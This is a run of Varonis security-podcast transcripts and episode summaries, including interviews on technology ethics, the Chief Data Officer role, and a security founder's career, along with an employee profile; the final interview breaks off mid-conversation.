And then the internet when it was designed, it was never conceived as a tool that would be used by billions. It was kind of a network for research purposes to exchange data and everything. So, same for Facebook. It was never designed as a platform for an audience like this, which means that, in a sense, that the norms that are initially being embedded into those technologies do scale. And if, for example, for the internet, you don't embed security in it from the beginning and then you scale it up, then it becomes much more difficult to change it later on. So, ethics does scale, but maybe not in the way that we want it to scale.
Cindy Ng: So, you mentioned Facebook. And Facebook is not the only tech company that design systems to allow data to flow through so many third parties, and when people use that data in a nefarious way, the tech company can respond to say, you know, "It's not a data breach. It's how things were designed to work and people misused it." Why does that response feel so unsettling? I also like what you said in the paper you wrote that we're tempted to consider technology as morally neutral.
Wolter Pieters: There's always this idea of technology being kind of a hammer, right? I need a hammer to drive in the nail and so, it's just a tool. Now, information flow technology has been discussed for a while that there will always be some kind of side effects. And we've learned that technologies pollute the environment, technologies cause safety hazards, nuclear incidents etc., etc. And in all of these cases, when something goes wrong, there are people who designed the technology or operate the technology who could potentially be blamed for these things going wrong.
Now, in the security space, we're dealing with intentional behavior of third parties. So, they can be hackers, they can be people who misuse the technology. And then suddenly it becomes very easy for those designing or operating the technology to point to those third parties as the ones to blame. You know, like, "Yeah. We just provide the platform. They misused it. It's not our fault." But the point is, if you follow that line of reasoning, you wouldn't need to do any kind of security. Just say, "Well, I made a technology that has some useful functions," and, yes, then there's these bad guys that misuse my functionality."
On the one hand, it seems natural to kind of blame the bad guys or the misusers of whatever. On the other hand, if you only follow that line of reasoning, then nobody would need to do any kind of security. So, this means that you can't really get away with that argument in general. Then, of course, with specific cases, and then it becomes more of a gray area, where does your duty to prevent misuse stop? And then you get into the area, okay, what is an acceptable level of protection security?
But also, of course, there's the business models of these companies involve giving access to some parties, which the end users may not be fully aware of. And this has to do with security always being about who are the bad guys? Who are the threats? And some people have different ideas about who the threats are than others. So, if a company gets a request from the intelligence services like, "Hey, we need your data because we would like to investigate this suspect." Is that acceptable or maybe some people see that as a threat as well. So, the labeling of who are the threats? Are the terrorists the threats? Are the intelligence agencies the threats? Are the advertising companies the threats? This all matters in terms of what you would consider acceptable or not from a security point of view.
Within that space, it is often not very transparent to people what could or could not be done with the data. And then the European legislation is trying, in particular, to require consent of people in order to process their data in certain kinds of ways. Now that, in principle, seems like a good idea. In practice, consent is often given without paying too much attention to the exact privacy policies etc., because people can't be bothered to read all of that. And in a sense, maybe that's the rational decision because it would take too much time.
So, that also means that, if we try to solve these problems by letting individuals give consent to certain ways of processing their data, this may lead us to a situation where individually, everybody would just click away the messages because for them it's rational like, "Hey, I want this service and I don't have time to be bothered with all these legal stuff." But on a societal level, we are creating a situation where indeed certain stakeholders in the internet get a lot of power because they have a lot of data. This is the space in which decisions are being made.
Cindy Ng: We rely on technology. A lot of people use Facebook. We can't just say goodbye to IoT devices. We can't say goodbye to Facebook. We can't say goodbye to any piece of technology because as you've said, in one of your papers, that technology will profoundly change people's lives, and our society. Instead of saying goodbye to this wonderful thing that we've created or things, how do we go about living our lives and conducting ourselves with integrity, with good ethics, and morals?
Wolter Pieters: Yeah. That's a good question. So, what currently seems to be happening is that, indeed, a lot of this responsibility is being allocated to the end users. Like, you decide whether you want to join social media platforms or not. You decide what to share there. You decide whether to communicate with end-to-end encryption or not, etc., etc. So, this means that a lot of pressure is being put on individuals make those kinds of choices.
And the fundamental question is whether that approach makes sense, whether that approach scales, because the more technologies people are using, the more decisions they will have to make about how to use these kinds of technologies. Now, of course, there are certain basic principles that you can try to adhere to when doing your stuff online. But on the security sides, watch out of phishing emails, use strong passwords etc., etc. On the privacy side, don't share stuff off from other people that they haven't agreed to etc., etc.
But all of that requires quite a bit of effort on the side of the individual. And at the same time, there seems to be pressure to share more and more and more stuff even...and, for example, pictures of children that aren’t even able to consent to whether they want their pictures posted or not. So, it's, in a sense, there's a high moral demand on users, maybe too high. And that's a great question.
In terms of acting responsibly online, now, if at some point you would decide that we're putting too high a demand on those users, and the question is like, "Okay, are there possible ways to make it easier for people to act responsibly?" And then you would end up with certain types of regulation that don't only delegate responsibility back to individuals, like, for example, asking consent, but putting really very strict rules on what, in principle, is allowed or not.
Now, that's a very difficult debate because you usually end up also in accusations of paternalism, like, "Hey, you're putting all kinds of restrictions on what can or cannot be done online." But why shouldn't people be able to decide for themselves? For instance, on the other hand, people being overloaded with decisions to the extent that it becomes impossible for them to make those decisions responsibly. This, on the one hand, leaving all kinds of decisions to the individual versus making some decisions on a collective level that's gonna be a very fundamental issue in the future.
Prior to Varonis, Elena Khasanova worked in backend IT for large organizations. She did a bit of coding, database administration, project management, but was ready for more responsibility and challenges.
So seven years ago, she made the move to New York City from Madison, Wisconsin and joined the professional services department at Varonis.
With limited experience speaking with external customers and basic training, Varonis entrusted her to deploy products as well as present to customers. Elena recalls, “Not every company will give you a chance to talk to external customers without prior experience….But it was Varonis that gave me that chance.”
According to her manager, Ken Spinner:
Over the last 6 years, I’ve had the pleasure of working with Elena, first as a coworker in different departments, and most recently as the leader of our Remediation Team in our Professional Services department. Elena was uniquely qualified to lead the team as she had significant experience performing project management prior to planning and completing our first remediation projects. Elena’s knowledge was instrumental in defining the essence of the Varonis Data Risk Assessment, the process used by PS to perform remediation, as well as providing practical insight to Engineering during the development of the Automation Engine.
Not only am I involved in professional services, I also spend a lot of time on sales calls.
What did you learn about yourself after working at Varonis?
I am pretty good at selling concepts and ideas.
How has Varonis helped you in your career development?
Prior to Varonis, I only worked in internal IT. Varonis gave me a chance to work with external customers and exposed me to sales and product management.
What advice do you have for prospective candidates?
Pour your heart and soul into Varonis products. If you are smart and hard-working, it will be noticed right away.
What do you like most about the company?
Despite being a publicly traded company, it kept its startup spirit and passion.
What’s the biggest data security problem your customers/prospects are faced with?
Company files are often accessible by every employee regardless of their roles. How can we fix that without someone losing access to work they really need access to?
What certificates do you have?
CISSP and PMP
What is your favorite book?
Big Magic by Elizabeth Gilbert
What is your favorite time hack?
I assign values in my to-do list by urgency: important (not always urgent but is important in the long run), speed and reluctance.
Things I’m most reluctant to do, I try to do in the beginning of the day when my willpower is still high.
What’s your favorite quote?
"It would not be much of a universe if it wasn't home to the people you love."
– by the greatest scientist, Stephen Hawking
In the midst of our nationwide debate on social media companies limiting third party apps’ access to user data, let’s not forget that companies have been publicly declaring who collects our data and what they do with it. Why? These companies have been preparing for GDPR, the new EU General Data Protection Regulation as it will go into effect on May 25th.
This new EU law is a way to give consumers certain rights over their data while also placing security obligations on companies holding their data.
In this episode of our podcast, we’ve found that GDPR-inspired disclosures, such as Paypal’s, leave us with more questions than answers.
But, as we’ve discussed in our last episode, details matter.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Matt Radolec
With one sensational data breach headline after another, we decided to take on the details behind the story because a concentrated focus on the headline tends to reveal only a partial dimension of the truth.
For instance, when a bank’s sensitive data is compromised, it depends on how as well as the what. Security practitioner Mike Buckbee said, “It’s very different if your central data storage was taken versus a Dropbox where you let 3rd party vendors upload spreadsheets.”
We’re also living in a very different time when everything we do in our personal lives can potentially end up on the internet. However, thanks to the EU’s “right to be forgotten” law, the public made 2.4 million Google takedown requests. Striking the perfect balance will be difficult. How will the world choose between an organization’s goals (to provide access to the world’s information) versus an individual’s right to be forgotten?
And when organizations want to confidently make business decisions based on data-driven metrics, trusting data is critical to making the right decision. Our discussion also reminded me what our favorite statistician Kaiser Fung said in a recent interview, “Investigate the process behind a numerical finding.”
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Forrest Temple, Mike Buckbee
Today even if we create a very useful language, IoT device, or software, at some point, we have to go back to fix the security or send out PSAs.
Troy Hunt, known for his consumer advocacy work on breaches, understands this very well. He recently delivered a very practical PSA: Don’t tell people to turn off Windows update, just don’t.
We also delivered a few PSAs of our own: cybercriminals viewour linkedin profiles to deliver more targeted phish emails, whether we’d prefer to deal with ransomware or cryptomalware, and the six laws of technology everyone should know.
Tool of the week: MSDAT
Panelists: Cindy Ng, Forrest Temple, Kilian Englert, Mike Buckbee
IT pros could use a little break from security alerts. They get a lot of alerts. All. The. Time.
While alerts are important, a barrage of them can potentially be a liability. It can cause miscommunication, creating over reactivity. Conversely, alerts can turn into white noise, resulting in apathy. Hence the adage: if everything is important, nothing is. Instead, should we be proactive about our security risks rather than reactive?
Articles discussed:
Panelists: Cindy Ng, Kilian Englert, Forrest Temple, Kris KeyserRegular listeners of the Inside Out Security podcast know that our panelists can’t agree on much. Well, when bold allegations that IT is the most problematic department in an organization can be, ahem, controversial.
But whether you love or hate IT, we can’t deny that technology has made significant contributions to our lives. For instance, grocery stores are now using a system, order-to-shelf, to reduce food waste. There are apps to help drivers find alternate routes if they’re faced with a crowded freeway. Both examples are wonderful use cases, but also have had unforeseen side effects.
Even though profits are up, empty aisles at grocery stores are frustrating shoppers as well as employees. Quiet neighborhoods that became alternate routes are experiencing traffic due to a new influx of drivers as well as noise pollution.
When there are unforeseen consequences from a technological improvement, are we manifesting chaos or a security risk?
Other articles discussed:
Tool of the week: Pown ProxyPanelists: Cindy Ng, Kilian Englert, Mike Buckbee, Matt Radolec
It’s our first show of 2018 and we kicked off the show with predictions that could potentially drive headline news. By doing so, we’re figuring out different ways to prepare and prevent future cybersecurity attacks.
What’s notable is that IBM set up a cybersecurity lab, where organizations can experience what it’s like go through a cyberattack without any risk to their existing production system. This is extremely helpful for companies with legacy systems that might find it difficult to upgrade for one reason or another. But we can all agree what’s truly difficult are the technologies that you can’t just fix with a patch, such as the Spectre and Meltdown attacks.
Other articles discussed: Hotmail changed Microsoft and email
Panelists: Cindy Ng, Kris Keyser, Kilian Englert
The emergence of Chief Data Officers(CDO) demonstrates the growing recognition of information as an asset. In fact, Gartner says that 90% of large organizations will have a CDO by 2019.
To understand the CDO role more deeply, I turned to Richard Wendell.
I met Mr. Wendell last year at the Chief Data Officer Summit and thought his background and expertise would help us understand the critical role a CDO plays in managing an organization’s data.
Mr. Wendell is a is a founding Member of the Board of Directors of MIT’s International Society for Chief Data Officers (ISCDO). Under his leadership, he has helped create and shape the de facto community of senior executives responsible for maximizing the opportunities in data-driven decision making. Prior to ISCDO, Mr. Wendell spent two and a half years as the Vice President of Data Science and Strategic Analytics for Tyco Electronics.
In this first part in a series of podcasts, Mr. Wendell defines the role of a CDO, the value a CDO brings to an organization and what a CDO needs to do in order to thrive.
Most recently, Mr. Wendell is a founding member of the board of directors of MIT's International Society for Chief Data Officers.
I'm thrilled to have Richard Wendell join us today to tell us more about the goals of a CDO. Because, according to Gartner, by 2019, 90% of large organizations will have a Chief Data Officer.
Richard: Sure, Cindy, happy to. So, the world around us is changing very, very fast. Particularly, when you start talking about information and technology. So, just out of curiosity I went and I was looking at Google Analytics and Google Trends and some search terms for "chief data officer." And the first blip that we start seeing of any significance around "chief data officer" searches came in late 2011. Then we start to see another uptick in 2012.
And, more or less, since 2013, up through current time, the searches on Google for the word "chief data officer" are growing at 100% compound annual growth rate. So, really substantial uptick.
Like many areas in its early days, there are some different meanings for what people mean by chief data officer and the areas of responsibility.
What we're seeing, different flavors of chief data officers, but by and large they could be characterized in sort of two buckets, the defensive chief data officer and the offensive chief data officer.
Defensive CDOs, often there are a lot of them in financial services. They're more responsible typically for data governance, reporting, regulatory, and really critical functions.
Quite different from the offensive CDOs we're seeing. Offensive CDOs still can be in financial services, but increasingly in other sectors, like life sciences and retail and CPG, are focusing on transforming companies that want to be, 20th century companies that want to be 21st century companies. So really, transforming the enterprise around data and analytics. Coming out with new ways of using data, data science to create insights that are truly going to be transformational for the way that business conducts itself into the future.
You can see, both called CDOs, but two very, very different missions and mandates.
Richard: So, the answer to that question is part, I think, very largely the job of the CDO, right?
So, quite often a CDO, particularly offensive CDOs, their job starts like this: a CEO or a CFO or maybe a CMO says,
"We want our company to use data science. We want our company to be more data driven, and we want to start capitalizing on these new technologies. Go figure out what that means for us."And so...and that's quite often the beginning point for a chief data officer. Now, I think on a high level, in my mind, particularly the more...the chief data officers who are looking to drive transformation and innovation have to really successfully string together three critical areas:
You really...in the beginning, the value chain is raw data, and at the end is raw dollars.
If you want to get from raw data to raw dollars, you have to check all three of those boxes. And, so many organizations focus on that middle slice, the analysis piece, the insights piece. Insight is incredibly important, but insight's only one of those three boxes.
Richard: Yeah, yeah, I mean data is absolutely critical for sure. I mean data is the raw material, the building blocks on which everything else is contingent. So I would argue that data is critical, necessary, but not sufficient.
At the end of the day…creating the right data that is ready for analysis and driving insight is really, really challenging. I don't want to undermine the really intense hard work that comes out of figuring out what to do when your enterprise has many, many data centers. Or, hit legacy ETL scripting that is indecipherable and not well documented.
These are just two of the many challenges that Chief Data Officers face in creating good quality data. I would just say though, that businesses are here to make money. That could mean different things. It could be on the P&L side, on revenue and growth like you're talking about. Or, it could be cost savings efficiencies, right? Or, it could also be over on the balance sheet.
There are many, many fantastic data and analytics use cases that don't hit the P&L, but hit maybe it's a reduction in inventory that flows over to a cash savings on the balance sheet. Or, increase in customer lifetime value, which has many intangible effects.
So, I think really, across all the company financials, it's really the job of a chief data officer to understand business strategy, corporate strategy well enough to say,"What is the company's strategy? Are we here to accelerate revenue and growth? Are we here to transform our industry? Or, are we here to drive efficiencies?"
And then, based on that corporate strategy, figure out where the right strategic levers across the P&L and the balance sheet. And then, what data has to be put together, prepared in what way, and used in what combination with analytics to drive those strategic levers.
Inside Out Security: And for the CDO to highlight, okay here's why you brought me in. Here's what's important to the company. Here's how we'll achieve, and here's the roadmap to where we want to go.
Richard: Yeah, and you know, here's the money that we're making because I'm here. I think that one of the critical, sort of in my opinion, one of the critical success factors of a chief data officer is being able to translate between the technical language of data and analytics, and the maybe less technical but equally important language of business and strategy.
So, when you are talking to a CEO or a Board of Directors or a CFO or a CMO or whoever it may be, you're not speaking geek all the time, right?
You're speaking to them in a language that they understand, and you're talking to them about making money. Which, ultimately, most businesses are around to make money.
Inside Out Security: And really, for this CDO to speak their language too.
Richard: So important, being a good listener. I think that CDOs really...in order to know where to focus and prioritize the really, frankly, expensive investments in data and analytics that companies are making - it's so important to be able to listen to one's stakeholders, be it the GMs or presidents of a large business unit or the chief marketing officer.
But really, those partners who are ultimately going to be critical to the adoption of the insights that are created out of data and analytics, that translate those insights into action, and ultimately money.
Listening to them and what are their priorities is such a really important first starting point. Because at the end of the day if...we could be creating the coolest data asset in the world, but if it's not generating insights that people care about or want to act on, it's hypothetical.
Richard: The relationship with a chief marketing officer is really critical.
I mean it's very different for different kinds of companies. Obviously, consumer companies have very different marketing focus than B-to-B companies, so I can't 100% generalize all the time.
But by and large, marketing is on the front end of the business.
Marketing often owns the customers. Marketing is quite often either responsible for customer acquisition, or closely partnered with sales, and jointly responsible for customer acquisition. And increasingly, responsible for the digital channels, so the web channels to the customer, and other digital channels.
And those digital channels have a lot of data, and a lot of analytics.
And, what has happened in a lot of companies is the marketing teams have built up their own sort of ownership of customer data. Be it CRM data, be it digital web data, and maybe even some of their own specialized analytics around how to leverage that data to get the right insights from a marketing perspective. All good things, all very good things, but from a different perspective you could also think of that as a silo.
So, what happens in a company where at the end of the day...say the company is manufacturing a product, right?
Maybe it's the case that getting up the product that you make to your customer quickly is the largest driver of customer satisfaction and customer lifetime. So, makes sense. People want to get their things quickly, that they buy, right? That's Amazon's model.
So, well what if...and a lot of these companies...how quickly...how much of a product you manufacture, and how much inventory you store is more on the operations side. So, what to do in a company where that more operation or transaction data resides either in operations or in IT, and marketing has digital data.
But at the end of the day, the company wants to do the right things for its customers. It wants to get the customers, in this example, their products quickly. Well, in this kind of...this is a perfect example. I've seen it many times. And this is where a chief data officer comes in.
A chief data officer's primary job is breaking down these silos and helping a company optimize all of its data and analytics through different groups to get to its strategy.
Self-quantified trackers made possible what was once nearly unthinkable: for individuals to gather data on one’s activity level in order to manage and improve one’s performance. Some have remarked that self-quantified devices can hinge on the edge of over management. As we wait for more research reports on the right dose of self-management, we’ll have to define for ourselves what the right amount of self-quantifying is.
Meanwhile, it seems that businesses are also struggling with a similar dilemma: measuring the right amount of risk and harm as it relates to security and privacy.
Acting FTC Chairman Maureen Ohlhausen said at a recent privacy and security workshop, “In making policy determinations, injury matters. ... If we want to manage privacy and data security injuries, we need to be able to measure them."
A clearly defined measurement of risk and harm will become ever so important as the business world embrace deep learning and eventually artificial intelligence.
Other articles discussed:
The end of the year is approaching and security pros are making their predictions for 2018 and beyond. So are we! This week, our security practitioners predicted items that will become obsolete because of IoT devices. Some of their guesses - remote controls, service workers, and personal cars.
Meanwhile, as the business world phase out old technologies, some are embracing the use of new ones. For instance, many organizations today use chatbots. Yes, they’ll help improve customer service. But some are worried that when financial institutions embrace chatbots to facilitate payments, cyber criminals will see it as an opportunity to impersonate users and take over their accounts.
And what about trackers found in apps bundled with DNA testing kits? From a developer’s perspective, all the trackers help improve the usability of an app, but does that mean we’ll be sacrificing security and privacy?
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Kris Keyser, Mike Buckbee
Recently the Food and Drug Administration approved the first digital pill. This means that medicine embedded with a sensor can tell health care providers – doctors and individuals the patient approves – if the patient takes his medication. The promise is huge. It will ensure a better health outcome for the patient, giving caretakers more time with the ones they love. What’s more, by learning more about how a drug interacts with a human system, researchers might find a way to prevent illnesses that was once believed impossible to cure. However, as security pros there are some in the industry that believe that the potential for abuse might overshadow the promise of what could be.
Other articles discussed:
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
Last week, I came across a tweet that asked how a normal user is supposed to make an informed decision when a security alert shows up on his screen. Great question!
I found a possible answer to that question at New York Times director of infosecurity, Runa Sandvik’s recent keynote at the O’Reilly Security Conference.
She told the attendees that many moons ago, Yahoo had three types of infosecurity departments: core, dedicated and local.
Core was the primary infosec department. The dedicated group were subject matter experts on security, still on the infosec department, but worked with other teams to help them conduct their activities in a secure way. The security pros on the local group are not officially on the infosec department, but they’re the security experts on another team.
Who knew that once upon a time dedicated and local security teams existed?! It would make natural sense that they would be the ones to assist end users on security questions, why don’t we bring them back? The short answer: it’s not so simple.
Other articles discussed:
Long before cybersecurity and data breaches became mainstream, founder and CEO of SPHERE Technology Solutions, Rita Gurevich built a thriving business on the premise of assisting organizations secure their most sensitive data from within, instead of securing the perimeter from outside attackers.
And because of her multi-faceted experiences interacting with the C-Suite, technology vendors, and others in the business community, we thought listening to her singular perspective would be well worth our time.
What stood out in our podcast interview? When others are concerned about limited security budgets, Gurevich envisioned more hands on deck in the field of information security. The reason is that there are more and varied threats, oversaturated vendors in the marketplace, and a cybersecurity workforce shortage.
“What I see happening is that there’s going to be subject matter CISOs across the company; where there will be many people with that title that become experts in very specific domains.”
Also, now that cybersecurity concerns are not as industry specific, Gurevich does recognize that there are certain industries that are more at risk than others.
She approaches all industries with varying degrees of risk and threats, compliance requirements, and disparate systems all in a strategic way – by giving organizations the visibility into their data and systems, what they need to protect and how they need to protect it.
Rita, you founded SPHERE in the wake of the 2008 financial crisis when you were just 25 years old. Can you tell us about the process behind how you started your business and what kind of services you provide.
Rita Gurevich: Absolutely, I started the company, essentially, on the collapse of Lehman Brothers. And after the bankruptcy, there were many different firms that bought different areas of Lehman. And I was put on a team to help figure out how to split apart all the different data and assets they owned.
So if you can imagine, up until that point. Lehman was super centralized. It was operating as one company, with lots of shared services.
And overnight, we essentially had to figure out who gets what.
So Barclay’s Capital bought a part of the business. Numera bought a part of the business. Neuberger bought a part of the business. All these different financial services firm that bought different business units from Lehman Brothers.
And what we had to do, was essentially a crash course on deep data analytics. We had to learn how to get a really quick understanding of who uses what, map that to different business entities, to figure out where it needs to go.
So that required a lot of tools, a lot of metrics. We built all these algorithms. And we had to do it almost overnight.
And soon after, slightly a traumatic time, in the history of our country, I had a bit of an ‘aha’ moment when decided to do some independent consulting.
I quickly built a business, and now we focus on cyber security. We have a niche around data governance, identity, and access management, as well as privilege access management. And a lot of the experience that I gained at Lehman was very relevant for what I do now, because you essentially had to figure out how do I capture the information that's necessary from my environment to create metrics and analytics that are relevant to making sure my information is secure, understanding who owns what, and even potentially preparing myself for some M&A activities.
Cindy Ng: And so, can you describe your work at Lehman Brothers and how that you made the connection that it was important to start your business.
Rita Gurevich: Sure. So, during that time, during the bankruptcy, it was really all about data analytics. It was really about looking at all the different data, all the different assets that Lehman owned and figuring out, "Okay, who gets what?" So, if Barkley's bought investment banking, how do you know what data belongs to investment banking? If Neuberger Berman bought investment management, the investment management business, how do you figure out what data belongs to investment management? So, it was all around going really deep into the data, and using the right tools to capture all the metadata, all the activity, so you can gain an understanding of who's using it? Who owns it? and where does it need to go?
So, at that time, not a lot of companies were doing that, and there wasn't really a lot of need to do that at the time. But around 2008-2009, there was just so much movement within financial services. And there was so much happening in terms of companies going bankrupt, being acquired by other companies, all these different businesses kind of spinning up, and changing, and moving hands that this concept became a lot more relevant. So, when I started the company, it really was around selling myself and my experience that I learned, which was very unique at the time. But over the course of not a very long amount of time, probably two years or so, the focus definitely shifted.
So, initially I was talking to infrastructure people, I was talking to operations people, and I was talking about data analytics. And while it was definitely a nice to have, and people cared about it. Budgets were really tight. We're still knee-deep in one of the worst recessions in our country. So where are the budgets, where are people focusing, where are, you know, the executives and the board members, you know, allocating resources? And that was for information security. So around 2009-2010, I think the concept of data breaches became a lot more relevant. It became more, kind of, a commonly used word. Companies were starting to actually hire chief information security officers. They were starting to look at data analytics from a security perspective. They wanted to get a better handle to prevent data getting into the wrong hands, and that's when I shifted the focus from data analytics to data security. And I think that was monumental for me, because really that's the premise of what my company does today around the data governance program that we implement.
So I think that my experience at Lehman was definitely a blessing in disguise, but I think that probably anybody that was focusing on data analytics, even tangentially, started to think about data security as well.
Cindy Ng: You were 25 when you first started your business. A lot of your college cohorts they were still on their first, second, or third job. Was that relevant or you looked at the opportunity and ran with it?
Rita Gurevich: I think that my age was probably one of my biggest challenges when it came to starting my business and definitely in the earlier years. And you can only imagine, you know, a 25 year old walking into a managing director's office, and essentially telling them that they can do a better job than his team can do. That's a really difficult thing to say, and you gotta prove it. So, once you actually start working for them, you better do a good job, which luckily I did and my team did. But as I compare to my other college cohorts, I actually think that because I went to Stevens Institute of Technology, in Hoboken, New Jersey. My business is in Jersey City. My customers are international, but quite a few of them have headquarters in this kind of tri-state area. A lot of my college peers went on to work at all these different companies that could be potential customers at Sphere. So, I think actually it created an opportunity for me because it opened the door to have the right conversations with people in technology to explain, you know, what I'm working on, and what I'm doing.
And, you know, part of having a successful business is not just a good idea, but it's having people that you can actually sell to, having a relevant problem that's gonna help people in their professional careers and their professional lives. So I think that my relationship from school and being not so far off from graduating college helped more than hurt. But also from the Lehman bankruptcy, like I mentioned earlier, it was a time where there was a lot of movement, and a lot of people went to all sorts of different firms on the street. And it was different than how it used to be in the past, where people stayed at the same company for a really long time. That movement essentially for me, created an overnight network, where I was able to kind of leverage people that I knew and had worked with for a handful of years across all sorts of different companies within the demographic that I was targeting. So, yeah, I think that the age was definitely sometimes a challenge, but I actually found ways to have it be a benefit as well.
Cindy Ng: But in terms of age, it's almost non-relevant as long as you have a value proposition, and people are interested.
Rita Gurevich: That's a really, really good point. So, there's kind of two aspects to it, right? So, if you have something interesting to say, that's great, but the way you communicate that message is almost more important, and there has to be a confidence in the way that you present the problem that you're solving and your solution that's going to set you apart from others that are knocking on the same people's doors, maybe for different areas, but are competing for the attention of the people that you're trying to get in front of. So, I call that, you know, learn confidence. I can't honestly say that at 25 I felt like I knew everything. I knew I didn't, but you have to be able to present yourself in a way where the person on the other side of the table knew that, even if you don't know the answer, you will figure it out, and the other part of that is perseverance. You have to make sure that you continuously have your goals in mind and push forward.
You know, I mentioned that my company focuses on security, and while that's still relevant and even in 2008, 2009, 2010, it was also very relevant. You can imagine that the people that are in charge of security at these companies have lots of vendors, and lots of partners, and lots of even internal people, knocking on their door vying for their time. So you have to just make sure that your message comes across strong and that, again, there's a confidence in your approach, and you will deliver when push comes to shove.
Cindy Ng: And when you talk about your learned confidence, when a meeting didn't go as planned, or a presentation didn't go as planned, what was your self-talk like?
Rita Gurevich: That’s a great question. So I’ve learned that you have to listen more than you speak. You’re going to learn a lot through osmosis. Just by being in a room, where the conversation is happening. You’re just going to learn and get better. Sometimes, it’s just echoing a common opinion or a common sentiment that the other person has on the other side of the table, and reaffirming them that you’ve also experienced the same problem that they’re sharing. Or you’ve seen it somewhere else. Or you’ve solved that problem with a peer of theirs. So I think that learned confidence isn’t necessarily about having memorized specific compliance requirement or a specific way of doing some task. It’s more about doing a thing more logically. And if you don’t know, it’s okay not to know. Just make sure your follow up and follow through is there. No one expects experts. Data security and cybersecurity as a whole is a very new area. Everyone is learning as we go. It’s all common knowledge. But it’s can you think of solutions in a creative way and that you’re solving the problems that people are having. And sometimes, it’s not reinventing the wheel. Sometimes it’s solving an existing problem in a smarter and more scalable, and a more efficient way. I’ve learned that by failing sometimes. You don’t have to come up with an idea that no one thought of. You just have to come up with a more practical way of doing things sometimes. And the other bit of advice and something that I really believe in is, is becoming kind of a master of some things. So, instead of the "jack-of-all-trades", focusing in on something and becoming really good at it, and, you know, that's what I did. So I call Sphere a cybersecurity company, but we're actually pretty niche. We focus on internal threats, and we specifically focus on putting controls on your data, your systems, and your assets. So, it's a very kind of narrow piece of the pie when you look at cybersecurity as a whole, but that allows my team, and that allows me to train new personnel really, really effectively because you can hone in on very specific topics. You can give real world examples of very specific things, and people can really start to grasp, you know, the complicated challenges that we're solving, but also think of them in a more simplistic, logical way.
You know, all these technology challenges from data breaches and around, you know, hackers and all that, it feels very complicated. It really does, but when you break it apart and remove the technical jargon, the problems and the reasons these things are happening are not overly technically challenging problems. A lot of them are profits driven, they're people driven. They're not necessarily about, you know, the right configuration of a tool within, you know, this specific domain. It's a much more kind of systematic issue. So, I think when you start to gain an understanding of this base, you start to figure that out pretty quickly.
Cindy Ng: On top of starting your business at a really young age, there aren't a whole lot of females in the industry, and we talk a lot about women in tech, but, you know, I wonder how can men join the conversation, because they coexist with us on this planet, and I wanted to hear your perspective in how we can enlist men as allies in our industry?
Rita Gurevich: I definitely get asked a lot about this topic, because, you're right, there's not a lot of women in tech, and to be honest there's not a lot of women CEO's either, so you kind of merge women, tech, CEO. I guess, I'm a little bit of an anomaly, but I'm hoping that's not for very long. I think honestly we need to stop caring that the person that's joining the conversation is a woman, and we know that there's going to be equality, and we're not forcing that distinction. And I think more and more women are getting involved in technology early on. And technology is part of nearly every child's life right now independent of gender, and I think that naturally maybe the next 10 to 20 years. It's gonna cause dramatic shifts in ratios in the tech workplace.
And I really think that tech is going to be early adopters of inclusiveness of women and inclusiveness across the board. Technology is very interesting because it's analytical thinking, it's problem solving, researching. Definitely mixed in sometimes with creativity and out of the box thinking. Maybe I'm partial, but I think these are natural traits of women, and in the end if you work for a big company, managers want successful teams, and their managers want successful orgs, and women will rise through the ranks as there's just going to be more of them in the running.
Unfortunately, I think that other industries are not as fortunate. And I bring up two specific women whenever I talk about this topic.
One, I met at a panel I was on, "Women In Engineering," and she's a civil engineer at a big company, and she works a lot with construction companies. And once she's on a job site, she's like they assume that she's a secretary, and even when she explains herself they just don't listen to her, and they won't take direction from her. And she's expressed how difficult it is for her to advance and these are challenges that have nothing to do with brains, with smarts, with experience. It's really a people problem, and I don't envy that. You know, I struggle with even thinking about how do you adjust that mentality.
Another example is a woman that I met as part of the EY Entrepreneur Of The Year Program, which I was on as to be recognized as well there. But she owns a liquor company and half of her job is in a warehouse, and the employees are chain-smoking, they're, you know, a bunch of old men, no offense to old men, but they kind of act like they've never seen a woman with any level of authority before. And it's sad, and, you know, I'm very fortunate that I work in an industry where technology is definitely going to be on the forefront of diversity and inclusiveness, but you look at some of these other industries, and you hope that they'll follow suit. You know, hopefully sooner rather than later as more women in general are joining the workforce and taking on careers that aren't traditionally careers that women participate in.
Cindy Ng: So, let's go back to the technology, and you work with many different sectors, retail, energy, hospitals, financial. Can you speak to the different industries and what their concerns are regarding security?
Rita Gurevich: I think this is the first time ever that concerns are not as industry specific as they used to be. And I think that's also due to just the times that we live in. I mean, everybody now cares about cyber security, people are starting to understand how this affects them personally, how it affects them professionally. You know, a year ago, nobody in my family understood what I did for a living, and now, even my grandmother gets it. You know, anytime that there's like a breach in the news breach or on the front page of the paper, she'll call me, and she'll say, "Too bad they didn't have Sphere". It's pretty cute, but I think that just shows that the concept of data breaches and cyber security is part of everybody's lives. The expectation is that everybody's going to be involved, and anybody is up for grabs to be affected. And I think the equifax breach is just a prime example. I mean, it was on every news channel we all know that half the country was affected by this. You think about how many people had to, you know, read their credit or react to that event. It's becoming just common sense that every company, every industry needs to focus on this.
So, sometimes I think that the challenges experienced within the individual industries are scarier than others. So, we all know about financial firms. They've been the targets and on the front page of papers for a long time. But if we look at hospitals for example, that can be really scary. So, I'll give you another anecdote, I love these examples. I use a lot of them, but this one specifically that comes to mind was a panel at an event that we sponsored, and we had a group of CISOs in the front of the room. One of them was a woman, and she was the CISO of a big hospital network, and she explained ransomware and how it affects hospitals differently than, you know, a bank or somewhere else. And she explained, "Imagine you're a patient about to go into surgery, and the hospital has an attack, and your patient files are now locked down, and you have to now pay ransom in order to get them back, and you're back going to surgery, the doctors need these records", and this sounds like a very sci-fi example, and you're like "that doesn't really happen", but it really happens, and that's how it happens. It's not even that our wallets are being impacted, it's our health, it's our lives, it's how we receive healthcare is affected by cyber crime. It is so close to home for every single person in the world that I think the industry is just going to massively change. And I thing we're gonna start to see that almost immediately because it's just such commonplace knowledge. It's industry wide, it's not industry specific, and, again, it's not just our wallets that are affects, it's our health.
Cindy Ng: A lot of the problem previously and maybe even now that IT pros are having trouble connecting with the C-Suite, and I'm wondering after the breach, after the ransom, where are CEO's and individuals in the C-Suite getting more involved in cyber security? What are your recommendations when you're speaking with the C-Suite versus the IT pros, because you're kind of like a conduit between the two different channels?
